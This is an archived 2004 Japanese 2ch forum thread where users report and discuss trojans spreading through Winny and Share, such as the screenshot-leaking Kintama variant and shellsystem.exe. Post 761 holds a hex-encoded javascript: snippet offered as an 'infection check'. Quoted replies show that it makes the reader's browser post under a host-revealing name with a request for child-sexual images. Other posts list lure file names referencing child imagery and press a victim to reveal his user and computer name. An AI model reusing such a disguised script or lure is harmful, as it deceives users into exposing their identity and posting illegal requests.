【警報】Winnyを狙ったワーム・ウイルス情報 Part26

[表示 : 全て最新50 1-99 101- 201- 301- 401- 501- 601- 701- 801- 901- 1001- 2chのread.cgiへ]
Update time : 07/06 07:03 / Filesize : 237 KB / Number-of Response : 1002
[このスレッドの書き込みを削除する]
[＋板最近立ったスレ＆熱いスレ一覧 : ＋板最近立ったスレ／記者別一覧] [類似スレッド一覧]


↑キャッシュ検索、類似スレ動作を修正しました、ご迷惑をお掛けしました

1 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/11 12:10:15 ID:j8DDPfNG]: Winnyで流れているワーム、ウイルス等の報告・調査・対処をするスレです。
質問はテンプレを読んでからにして下さい。
読まずに質問しても「テンプレ嫁」と切り返されるだけです。
余裕があれば過去ログにも目を通してください。
なお、ここは初心者の質問スレではありません。

■流行種
・元祖Antinny系　・キンタマ系　・batファイル　・スクリーンセーバー　etc

■流行感染パターン
・exeの前にスペースたくさん（例：「秘密の写真.jpg　　　　　　　　　.exe」等）
・拡張子が.folderに変更されたHTMLからexeを実行させる
・autorunからbatファイルを実行させる
・スタートアップに解凍させ、再起動後exeを実行させる

■DL後のちょっとした注意
・落としたファイルは必ずウイルススキャンする
・exeファイルはうかつに実行しない
・ファイルのアイコンが偽装されてないか確認する

■全ての感染者に共通の、絶対確実な対処方法
ハードディスクをフォーマットした上で、Windowsの再インストールをする。
上書きインストールではダメです。
現在ハードディスクにあるデータは消えるので、待避するなり諦めるなりしてください。

前スレ
【警報】Winnyを狙ったワーム・ウイルス情報 Part25
tmp4.2ch.net/test/read.cgi/download/1093270545/l50

ﾃﾝﾌﾟﾚまとめ　www.geocities.jp/kemkzuenc/Antinny.html
Antinny対策サイト ttp://nyweb.hp.infoseek.co.jp/
752 名前：[名無し]さん(bin+cue).rar [04/09/23 07:02:00 ID:CBy0Cio6]: こうゆうのを見ると2chやnyする人ってヒッ●ーだけなのかなって思うね

v.isp.2ch.net/up/fa86350a6026.jpg

ウイルスに気づかずに必死に抜いている人1名ｗ
753 名前：469 mailto:sage [04/09/23 07:04:35 ID:kh8TR4yq]: これって本人達が寝てる間は安全なんだね。
754 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 07:08:11 ID:kh8TR4yq]: 数字消すの忘れた・・・＿|￣|○
755 名前：[名無し]さん(bin+cue).rar [04/09/23 07:08:12 ID:CBy0Cio6]: どうせなら、SS、PC名だけじゃなくて、
IP・ホストも晒してほしかったな
756 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 07:12:12 ID:IFT2b9V5]: >>752
これは狙ってやってる気がしないではないな(笑)
757 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 07:45:55 ID:CtAJ3p7u]: 俺はこんなウイルスは怖くて作れないな
何が怖いって狙われるのが怖いね
作った奴は絶対に捕まらないと思ってるんだから
本気になって追ってみたら面白いことになるかも
例えばウイルス作者が警察だったりしたらヤバイだろうし。
そうじゃなくても作った奴は確実に追われた後人生終わるだろうし
そんな一世一代の大事俺は出来ない
758 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 08:14:59 ID:wZ9Gu9IX]: 新種ウイルスと聞いてきました
759 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 08:15:35 ID:iqYKdWhe]: 面白い事考える奴もいるもんだな
760 名前：[名無し]さん(bin+cue).rar [04/09/23 08:18:41 ID:U98tvZkV]: Winnyは関係ないけどな。
今やってるのはShareで回ってるふしあなで2ch書き込みと半虹の苺ｷﾝﾀﾏ
761 名前：[名無し]さん(bin+cue).rar [04/09/23 08:25:55 ID:U98tvZkV]: 便乗してこれまで流行ってる
JavaScript:document.body.innerHTMLのｶﾞｲﾄﾞﾗｲﾝ2
that3.2ch.net/test/read.cgi/gline/1076853643/595-586

感染確認するには
2ch専用ブラウザを使用している人は、ＩＥなどの一般的なブラウザでこのスレを開いておく。
１、
javascript:s='7769746828646f63756d656e742e666f726d735b305d297b
46524f4d2e76616c75653d2766757369616e6173616e273b4d455353414
7452e76616c75653d275c75333045445c75333045415c75373533425c75
353043465c75333034465c75333036305c75333035355c7533303434273
b7375626d69742e636c69636b28293b7d';for(l=0,e="";l<s.length;l+=2)e+=
'%'+s.substr(l,2);eval(unescape(e));
をクリップボードにコピーし、メモ帳などのテキストエディタに貼り付ける。

２、改行を外して１行にする。
３、１行にしたものをクリップボードにコピーし、アドレスバーに貼り付ける。
４、 Enterを押す（もしくは「移動」をクリックする）。
エラーが出れば感染してます
762 名前：[名無し]さん(bin+cue).rar [04/09/23 08:26:46 ID:U98tvZkV]: >>761
参照間違えた・・
that3.2ch.net/test/read.cgi/gline/1076853643/595-596
763 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 08:27:19 ID:1gUyhrM3]: 　
764 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 08:51:04 ID:SPCjNc3y]: 俺はﾍﾟｹﾋﾟｰがはじめての初心者だが、拡張子表示は真っ先にやったぞ…。
まぁ、かつては黒羊とﾒｰﾙｽﾄｰﾑをふんだ苦い経験持ちだが。
765 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 09:07:42 ID:SY1J+4JW]: >>761
ﾜﾛﾀ
ロリ画像ですか
766 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 09:08:11 ID:GmtpX3PS]: 【使用OS】WinXP
【WindowsUpdateしてるか】はい。
【AntiVirusは】？？
【ちゃんとUpdateしてるか】？？
【スキャンした結果】オンラインにてスキャン
【オンラインスキャンしたならその結果は】いつもなら数個出るのに、不自然なぐらい何も検出されませんでした。
【Winnyのﾊﾞｰｼﾞｮﾝ】使ってません。ネットでウィルス貰いました。
【Winny歴、総DL量は】無し
【テンプレを読んだか】はい。
【テンプレにある対策を実行したか】実行しました。特に何も無かったです。
【症状か具体的に、分かる限りすべて書く】何となく、重い。動作が鈍い。
【何をしたらそんなことになったのか】うｐされてたファイルを開いたら。
【これまでにとった措置】オンラインスキャンのみ。
767 名前：[名無し]さん(bin+cue).rar [04/09/23 09:12:14 ID:U98tvZkV]: >>766
(写真集) (ロリータ) 水原友里.exe
(写真集) (ロリータ) 相田香奈子.exe
コピー～ (写真集) (ロリータ) 河瀬菜美.exe
どれか開いた?
768 名前：[名無し]さん(bin+cue).rar [04/09/23 09:19:52 ID:Jz5Ghtix]: キンタマ作った香具師、逮捕されたのか
769 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 09:25:30 ID:GmtpX3PS]: >>767
開いたというか、ダブルクリックして開こうとした。
どれだったか覚えてない…。多分、２回ぐらい開こうとした。
何か怪しかったし、急にPCの反応がおかしくなったから、速攻電源切りました。
その後にまた起動して、全部ゴミ箱に捨てて、ゴミ箱も空にしました。
770 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 09:28:46 ID:kh8TR4yq]: >>769
もう遅いｗ
とりあえず↓に来い。
削除の方法が分かるかもしれない。

アップローダーってずるい
idol.bbspink.com/test/read.cgi/ascii2d/1095880065/
771 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 09:28:49 ID:j/Jnnczc]: >>769
今すぐネットを切断
C:\WINDOWSフォルダの中でshellsystem.exeを消せ
再起動して後は知ってるならレジストリの自動実行の辺りを探せ
急げ
772 名前：[名無し]さん(bin+cue).rar [04/09/23 09:29:12 ID:U98tvZkV]: >>769
とりあえずユーザ名とコンピュータ名を晒せ。
マイコンピュータのプロパティから見れる。
773 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 09:30:19 ID:afWjuRcq]: >>766
ご愁傷様
774 名前：[名無し]さん(bin+cue).rar [04/09/23 09:30:56 ID:0ylh05j4]: >>685
を見て確認してみ
775 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 09:41:27 ID:P9SKfCRL]: >>762
596 名前：水先案名無い人[sage] 投稿日：04/09/21(火) 22:21:33 ID:aLtl7+rE<
>>595のやつやると名前欄fusianasan、本文ロリ画像くださいで勝手に投稿されるってわけか？

597 名前：水先案名無い人[] 投稿日：04/09/21(火) 23:16:48 ID:raTTdWET<
16進でご苦労な事だ。

598 名前：p29d3b8.urawac00.ap.so-net.ne.jp[] 投稿日：04/09/21(火) 23:18:09 ID:ItaWKNCP<
ロリ画像ください

599 名前：水先案名無い人[sage] 投稿日：04/09/21(火) 23:18:27 ID:ItaWKNCP<
orz

600 名前：水先案名無い人[sage] 投稿日：04/09/22(水) 00:18:50 ID:8s+8uxdE<
おらは投稿確認が出て助かっただ

601 名前：水先案名無い人[sage] 投稿日：04/09/22(水) 01:00:01 ID:A3RcQubp<
そいえば、たいていの掲示板ってhttpだからポストする時に
暗号化されていないデータが云々のダイアログを出せるはずだが、
それを解除してる人って結構多いみたいだね。

602 名前：zaq3d2e96f7.zaq.ne.jp[] 投稿日：04/09/22(水) 02:42:09 ID:nVW0EyTb<
ロリ画像ください

603 名前：濡れ衣 zaq3d2e96f7.zaq.ne.jp ◆SbICHIROZ6 [sage] 投稿日：04/09/22(水) 02:43:59 ID:nVW0EyTb<
570はどうなるかちゃんと書いておいてくれよ。。
リモホ晒すのは構わないけど、テストスレになっちまうぞ

604 名前：水先案名無い人[sage] 投稿日：04/09/22(水) 03:55:11 ID:7PnzxniJ<
いかん、笑いが止まらんｗ
やらんでよかったｗ
776 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 09:47:30 ID:tcoLxpqV]: ノートンでスキャン中の画像がよく晒されてたけど
対策ソフト入れてると安心するから簡単に引っかかるんじゃないの。
しかもこういう祭り時には無力。全くの無駄金だな。
777 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 09:53:59 ID:qlyssBj7]: 拡張子表示は鬱陶しいし、長いスペースとかがあるから詳細表示のファイルの種類で判断してるなぁ
778 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 09:55:34 ID:GmtpX3PS]: >>771
そのレジストリとやらは良く分からんが…
まあ、とりあえず初心者板で聞いてくる。
検索したらshellsystem.exeが見付かった。
とりあえず、急ぎます。ありがとう。
779 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 09:57:12 ID:cDvdfQLH]: >拡張子表示は鬱陶しい

ﾊｧ?
780 名前：[名無し]さん(bin+cue).rar [04/09/23 10:00:05 ID:/EYVc77v]: 明かされてる画像みても無害？
781 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 10:01:16 ID:xduUn+v/]: いくらノートン先生でも、登場したてのトロイにすぐには反応できませんぜ
今回の作成日時は、3本とも22日15:57 流されたのが夕方としても、まだ
10時間しかたってない。しかも踏んでるやつ大杉。

作者も、これほどの効果を期待してなかっただろーな。そうでなきゃアプロダ
が落ちるというのも考慮してると思う。この反応からして、ここ数日間に数種の
亜種が出てくると思う。トロイの改変も楽勝っぽいので、便乗犯も多そう。

一番のセキュリティホールは、ユーザーの意識だもんよ。
782 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 10:03:05 ID:Ze0M08FR]: ちなみにキンタマが発見されたのが3月半ば。対応は3月末。
783 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 10:03:32 ID:kDRZUavo]: 歴史は繰り返す。
784 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 10:05:29 ID:4TL6YJ26]: そして人は学ばない
785 名前：[名無し]さん(bin+cue).rar [04/09/23 10:07:05 ID:7loVoFeI]: mp3の名前などを勝手にいじるウィルスってあります？
786 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 10:08:25 ID:LvJ+JBBu]: >>729
アイコンでわかるだろ？
787 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 10:12:17 ID:kDRZUavo]: >>786
アイコンがフォルダアイコンに偽装されてるから無知が実行する。
788 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 10:16:24 ID:qJ0+JsGI]: で、誰かウイルス駆除ソフト屋さんに報告したの?
789 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 10:23:29 ID:iqYKdWhe]: >>780
画像自体は無害。
って、こんな程度の知識の人が踏むんだろうなぁ。
790 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 10:29:04 ID:ky5A4Ls4]: >>789
ttp://www.microsoft.com/japan/security/security_bulletins/ms04-028e.asp

こんなのがあるから一概には大丈夫とは言えないかもしれない
791 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 10:30:06 ID:0lvmtZMl]: >>789
っていう、おまえも相当やばいのだが
792 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 10:32:33 ID:cDvdfQLH]: >>789
　　　　　　　　　　　　　　　　　　　　　　　　　　,､ｧ
　　　　　　　　　　　　　　　　　　　　　　　　,､ '";ｨ'
_＿_＿＿___　　　　　　　　　　　　　　　／::::::/l:l
─- ､::::;;;;;;;;;｀ﾞﾞ''‐ ､　　 __,,,,......,,,,_／:::::::::/: !|
　　. : : : : : : ｀ﾞ'ヽ､:::ﾞヾ´::::::::::::::::::::::｀ﾞﾞﾞ'''‐'､. l|　　　またまた　ご冗談を
､､ . : : : : : : : : r'":::::::::::::::::::::::::,r':ぃ::::ヽ::::::::ヽ!　　　　　　　　　　　　　　　　　,､- ､
.ヽ:ﾞヽ; : : : : : :ノ:::::::::::::::::::::;;､-､､ﾞ::: 　　 rｰ-:'､　　　　　　　　　　　　　　／　　 }￢､
.　＼::ﾞ､: : : :./::::::::::::::;､-''"::::::::::　　　,...,:::,::.,　:::':､　　　　　　　　　　　_,,/,,　 ,､.,/ 　 }
　　　ヽ:ヽ､ /:::::::::::::::::::::::::　　　_　　｀ﾞ''‐''"　 __,,',,,,___　　　　　　　／~　　ヾ::::ﾂ,､-/
　　　　｀ヽ､:::::::::;;;､､--‐‐'''''',,iﾆ-　　　 _|　　､-l､,},,　￣""'''￢-, '　 ''‐-､ .,ﾉ'ﾞ,i';;;;ﾂ
　　　_,,,､-‐l'''"´:::::::'　　,､-'" ,.X,_,,､-v'"''ﾞ''yr-ヽ / ﾞﾞ'ヽ､,　　　 ,.'　　　　 jﾞ,,, ´　7
,､-''"　　　.l:::::::::::;､-''"　 ,.-'　　ﾞ､""ヾ'r-;;:l　　冫、　　ヽ､ /　　 __,,.ノ:::::ヽ. /
　　　　　　　l;､-'ﾞ:　　 ,／　　　　　ゞ=‐'"~ﾞﾞ')　./.　＼　　　　/　　'''"/::::;:::;r-''‐ヽ
　　　　　,､‐ﾞヽ:::::..,.r'ﾞ　　　　　　　　 ,,. ,r／ ./　　　ヽ.　　 ,'　　　 '､ノ''"　　　ﾉ
　　 ,､‐'ﾞ　　　ﾝ;"::::::.　　　　　　　"´ 'ﾞ ´　/　　　　　ﾞ､　,'　　　　　　　／
　　'　　　　　／/:::::::::　　　　　　　　　　　　{.　　　　　　 V　　　　　　／
　　　　／ ./:::::::::::::　　　　　　　　　　　　',　　　　　　 /　　　　　　　 /
.　　　　／　 /:::::::::::::::::.　　　　　　　　　　　　',.　　　　 /　　 ,.､　　　　 /
793 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 10:35:22 ID:iqYKdWhe]: >>790-792
いやあ、もちろんgdiplus.dllは知ってますって。わざわざ書かなくていいかと思ったんだけど。
こんなにレスが付くとは…。
794 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 10:36:31 ID:cDvdfQLH]: >>793
　　　　　　　　　　　　　　　　　　　　　　　　　　,､ｧ
　　　　　　　　　　　　　　　　　　　　　　　　,､ '";ｨ'
_＿_＿＿___　　　　　　　　　　　　　　　／::::::/l:l
─- ､::::;;;;;;;;;｀ﾞﾞ''‐ ､　　 __,,,,......,,,,_／:::::::::/: !|
　　. : : : : : : ｀ﾞ'ヽ､:::ﾞヾ´::::::::::::::::::::::｀ﾞﾞﾞ'''‐'､. l|　　　またまた　ご冗談を
､､ . : : : : : : : : r'":::::::::::::::::::::::::,r':ぃ::::ヽ::::::::ヽ!　　　　　　　　　　　　　　　　　,､- ､
.ヽ:ﾞヽ; : : : : : :ノ:::::::::::::::::::::;;､-､､ﾞ::: 　　 rｰ-:'､　　　　　　　　　　　　　　／　　 }￢､
.　＼::ﾞ､: : : :./::::::::::::::;､-''"::::::::::　　　,...,:::,::.,　:::':､　　　　　　　　　　　_,,/,,　 ,､.,/ 　 }
　　　ヽ:ヽ､ /:::::::::::::::::::::::::　　　_　　｀ﾞ''‐''"　 __,,',,,,___　　　　　　　／~　　ヾ::::ﾂ,､-/
　　　　｀ヽ､:::::::::;;;､､--‐‐'''''',,iﾆ-　　　 _|　　､-l､,},,　￣""'''￢-, '　 ''‐-､ .,ﾉ'ﾞ,i';;;;ﾂ
　　　_,,,､-‐l'''"´:::::::'　　,､-'" ,.X,_,,､-v'"''ﾞ''yr-ヽ / ﾞﾞ'ヽ､,　　　 ,.'　　　　 jﾞ,,, ´　7
,､-''"　　　.l:::::::::::;､-''"　 ,.-'　　ﾞ､""ヾ'r-;;:l　　冫、　　ヽ､ /　　 __,,.ノ:::::ヽ. /
　　　　　　　l;､-'ﾞ:　　 ,／　　　　　ゞ=‐'"~ﾞﾞ')　./.　＼　　　　/　　'''"/::::;:::;r-''‐ヽ
　　　　　,､‐ﾞヽ:::::..,.r'ﾞ　　　　　　　　 ,,. ,r／ ./　　　ヽ.　　 ,'　　　 '､ノ''"　　　ﾉ
　　 ,､‐'ﾞ　　　ﾝ;"::::::.　　　　　　　"´ 'ﾞ ´　/　　　　　ﾞ､　,'　　　　　　　／
　　'　　　　　／/:::::::::　　　　　　　　　　　　{.　　　　　　 V　　　　　　／
　　　　／ ./:::::::::::::　　　　　　　　　　　　',　　　　　　 /　　　　　　　 /
.　　　　／　 /:::::::::::::::::.　　　　　　　　　　　　',.　　　　 /　　 ,.､　　　　 /
795 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 10:37:15 ID:iqYKdWhe]: んー、でもよく考えると俺が間違ってるな。MSのGDI+の事も書けばよかった。
796 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 10:37:27 ID:xduUn+v/]: 今回のに限っていえば、晒されてるjpegは今のとこ無害だからな。
便乗してアプロに仕込むやつもいそうだが
797 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 10:41:34 ID:xduUn+v/]: つーか、GDI+対策しないで、今頃jpeg開く香具師が悪いと思われ
パッチがあがった時点から危険度急上昇だぞ
798 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 10:42:55 ID:EMRLV6EZ]: jpgで感染！？(ﾟдﾟ)すんのかよ！？
799 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 10:45:36 ID:LvJ+JBBu]: >>798
するよ～、jpg見るどころか、うｐロダ逝ったら即感染ですよ
怖いよ～ウィルスわ
800 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 10:52:21 ID:ky5A4Ls4]: まあ、SP2な俺には関係ないが
801 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 10:54:42 ID:iqYKdWhe]: >>798
まだしてないなら、すぐWindowsUpdataした方がいいよ。
って、「重要なパッチは、もうすでに当ててるだろ？」って認識で話するのは、やっぱり
やめた方がよさそうだな。そこが間違ってた。それに今後も新しく判明した画像処理の
脆弱性をついたウィルスが、現れない保証もない。これからは画像も油断できないと
言う事か。
802 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 10:55:44 ID:jZRbqOye]: >>801
SP2を入れると不具合出そうで恐いよ～。
803 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 10:56:54 ID:ky5A4Ls4]: ttp://www.openwall.com/advisories/OW-002-netscape-jpeg/crash/
とりあえずテストページ。ここの"I am ready to die."を踏んでクラッシュしたら
SP2を当てるかWindowsUpdateしないと危険。ちなみにﾉｰﾄｿが反応するから、
ウイルス対策ソフト入れてる人は安心してもいいかもしれない
804 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 11:07:06 ID:EMRLV6EZ]: ２ｃｈブラウザのjpg垣間見機能でもだめか？
805 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 11:12:11 ID:jZxILG0u]: >766
LANケーブル抜いてネット切断、それで首吊れ
806 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 11:12:12 ID:zW53Q5jb]: 苺きんたま対策(仮)
www.geocities.jp/ichigo_kintama/

まとめサイトできたようだ
807 名前：[名無し]さん(bin+cue).rar [04/09/23 11:14:52 ID:2DsdDYOp]: >>469
ダウンロードできないんだけど、もう削除されたかな？
808 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 11:22:10 ID:PFKtStB6]: >>766
再起動してタスクマネージャー開いてプロセス見ろ。
それでshellsystem.exeを終了させろ。
これで動作は速くなる。
あとはレジストリでshellsystem.exeを削除すれば終了
809 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 11:24:03 ID:sH8yfJe2]: マルチプロセスだからタスクマネージャからは消せんぞ。
810 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 11:27:07 ID:PFKtStB6]: >>809
遊びで感染したんだが、再起動させたら俺は消せた。
なんでかはわからん
811 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 11:31:26 ID:cDvdfQLH]: 112 名前：eatkyo287016.adsl.ppp.infoweb.ne.jp＠Share使用中 ◆i.ESDXOLYY [] 投稿日：04/09/23 10:43:42 ID:La2FDeZx
{Now!}俺のクリップボード(50byte 10行抜粋版, 何もコピーしてません)
～何も無いので環境変数晒し～

コンピュータ名: VIP
ユーザー名: takehiro

ﾜﾛﾀ
812 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 12:35:25 ID:2aG10cCS]: 俺どうせ割れ窓だから笑えるユーザー名でわざと踏んで晒してみるか
ほりえもんとか毎日新聞で凶悪ぺド画像とか
813 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 12:43:24 ID:IQ9BvSXd]: しまった、祭りに乗り遅れた。
nyか洒落にあがってないかな(w
814 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 12:45:03 ID:tyH5EMtg]: >>813
京都府警にしてよ
815 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 12:46:19 ID:k8gkpGNZ]: このトロイの動作解説ページってまだないかな。

なんかおもしろそうだから感染させてみたいんだが。
816 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 12:46:30 ID:IqZ2HObi]: × しまった、祭りに乗り遅れた。

○ うお
　　完璧乗り遅れた
817 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 12:49:27 ID:k8gkpGNZ]: Winnyを立ち上げてない限り，被害はないんだろ？
何で祭りになってんだ？？
818 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 12:51:17 ID:cDvdfQLH]: 初級ネットワーク板ローカルルール申請
qb5.2ch.net/test/read.cgi/operate/1095695740/

Share10_a56 + [9月21日付]ノードリストの文字列が多い・・・あやしいな
819 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 12:56:30 ID:J5HdIDac]: 「Share10_a56 + [9月21日付]ノードリスト」ってファイルにウィルス入ってるんだろうな
820 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 12:57:37 ID:pr4shzQV]: >>817
ｎｙは関係ない
821 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 12:59:51 ID:lSmv7nYn]: ファイル名変えて、あちこちに貼られてら。
822 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 13:00:20 ID:xCg9vDsC]: なんか、もれのデスクトップ画像が２ｃｈアプロと言う
どこかにアップされているらしいです。

それを見て自分を笑いたいのですが、どこにあるか
分かりますでしょうか。
823 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 13:00:37 ID:RdY8SqQw]: 俺はVirtual PC上のWinMEでny実行してるから、晒されても問題ないな。
しかもホストOSはOS Xだし
824 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 13:02:37 ID:cDvdfQLH]: Share10_a56 + [9月21日付]ノードリスト 18禁無修正ガンダム画像映画動画一般コミックエロゲ
PS2PV巨乳アニメゲーム一般ゲームサントラアルバムMAD無修正アプリ写真集DVD.zip
1,219,360
13deb3c8b87346cd5b1a9de9029c855fc7b6128e

これか
825 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 13:08:21 ID:NktT5qfN]: 7-zip反則だな。これなら1/3近くにもなるわけだ。

7-Zip (A) 3.12 Copyright (c) 1999-2003 Igor Pavlov 2003-12-10

Listing archive: F:\DESKTOP\キンタ~1.7Z

Date Time Attr Size Compressed Name
------------------- ----- ------------ ------------ ------------
2004-09-22 15:57:10 ....A 677376 319288 (写真集) (ロリータ) 水原友里.exe
2004-09-22 15:57:10 ....A 677376 0　　 (写真集) (ロリータ) 相田香奈子.exe
2004-09-22 15:57:10 ....A 677376 0　　コピー～ (写真集) (ロリータ) 河瀬菜美.exe
------------------- ----- ------------ ------------ ------------
2032128 319288 3 files

キンタ~1 7Z 319,524 04-09-23 12:58 キンタマ詰合.up1360.7z
キンタ~1 BZA 1,003,287 04-09-23 13:00 キンタマ詰合.up1360.bza
キンタ~1 CAB 1,032,957 04-09-23 13:00 キンタマ詰合.up1360.cab
キンタ~1 YZ1 1,055,366 04-09-23 12:58 キンタマ詰合.up1360.yz1
キンタ~1 ZIP 1,033,786 04-09-22 21:25 キンタマ詰合.up1360.zip
826 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 13:09:25 ID:cDvdfQLH]: ナニソレ
827 名前：[名無し]さん(bin+cue).rar [04/09/23 13:14:14 ID:EKR+VzAM]: これってjpgのリンク踏んだだけで感染するんですか
828 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 13:17:14 ID:cDvdfQLH]: ｎo
829 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 13:29:10 ID:JTze3qp6]: SSの機能を無効にする方法って無いの？
830 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 13:30:03 ID:H4H6HXnY]: 新種のキンタマが開発されたと聞いて飛んできました

ノートン先生がスルー・・・？　ｶﾞｸｶﾞｸﾌﾞﾙﾌﾞﾙ
831 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 13:32:02 ID:joit0XmS]: ファイル踏んだ覚えないのにshellsystem.exeがレジストリにあった場合は
感染してるんでしょうか
プロセスなどにはshellsystem.exeはありませんでした
832 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 13:34:53 ID:Y12C9VC7]: >>831
どうせ検索の履歴だろ
833 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 13:35:15 ID:H4H6HXnY]: >>831
削除するに越した事は無いんじゃないですか？
834 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 13:39:50 ID:joit0XmS]: Microsoft\search Assiant\ACMru\5603の位置にあったので検索履歴みたいです
ありがとうございました
835 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 14:25:04 ID:ungvXIMz]: test
836 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 14:58:32 ID:xduUn+v/]: >>825
その実験は興味深いな、7zなら重複ファイル簡単に探せるね。
CRCを見てて、同じだったらファイル名だけ残して捨てるんだな
つか、一見、普通のファイル集合体のようで、展開したら
むちゃくちゃ容量食う圧縮爆弾を簡単に作れるじゃねーか。怖。

ちなみにrarだと800KBぐらい
837 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 15:02:36 ID:mmGHQUsE]: exe ファイル　捨てたい
838 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 15:08:30 ID:jZRbqOye]: 苺きんたまきんたま
www.geocities.jp/ichigo_kintama/
これを。
839 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 15:25:44 ID:UZ3hgOe/]: >>837
602 名前：[名無し]さん(bin+cue).rar[sage] 投稿日：04/09/23(木) 00:03:45 ID:mmGHQUsE
俺は正直このくらいでいい。
観てるほうは面白いし晒された方はちょっと恥ずかしいけど
そんなにダメージでかくない。あとは画像が見れれば最強なんだが。

610 名前：[名無し]さん(bin+cue).rar[] 投稿日：04/09/23(木) 00:09:58 ID:mmGHQUsE
>>604
作者は力入れるとこ間違ってる気がする。

629 名前：[名無し]さん(bin+cue).rar[sage] 投稿日：04/09/23(木) 00:29:36 ID:mmGHQUsE
おいおまいら関祭りには参加しなかったのか？

634 名前：[名無し]さん(bin+cue).rar[sage] 投稿日：04/09/23(木) 00:35:59 ID:mmGHQUsE
tesu
840 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 15:26:49 ID:UZ3hgOe/]: 637 名前：[名無し]さん(bin+cue).rar[sage] 投稿日：04/09/23(木) 00:39:46 ID:mmGHQUsE
てす

639 名前：[名無し]さん(bin+cue).rar[sage] 投稿日：04/09/23(木) 00:42:44 ID:mmGHQUsE
ニュー速で規制されたorz
９０秒ってなげーよ・・・

662 名前：[名無し]さん(bin+cue).rar[sage] 投稿日：04/09/23(木) 01:10:41 ID:mmGHQUsE
しかし久々にflashget使ったよｗ

668 名前：[名無し]さん(bin+cue).rar[sage] 投稿日：04/09/23(木) 01:35:42 ID:mmGHQUsE
もううｐはやんだの？

679 名前：[名無し]さん(bin+cue).rar[sage] 投稿日：04/09/23(木) 02:47:44 ID:mmGHQUsE
あ～面白かった。三日分は笑ったな。

837 名前：[名無し]さん(bin+cue).rar[sage] 投稿日：04/09/23(木) 15:02:36 ID:mmGHQUsE
exe ファイル　捨てたい
841 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 16:00:42 ID:gRp4IpXR]: なになに？笑って見てたら笑えない状況になったのかID:mmGHQUsEは？
842 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/23 16:06:35 ID:QGmLVuGv]: txtなどのアイコンの変更はどうやるのでしょうか？
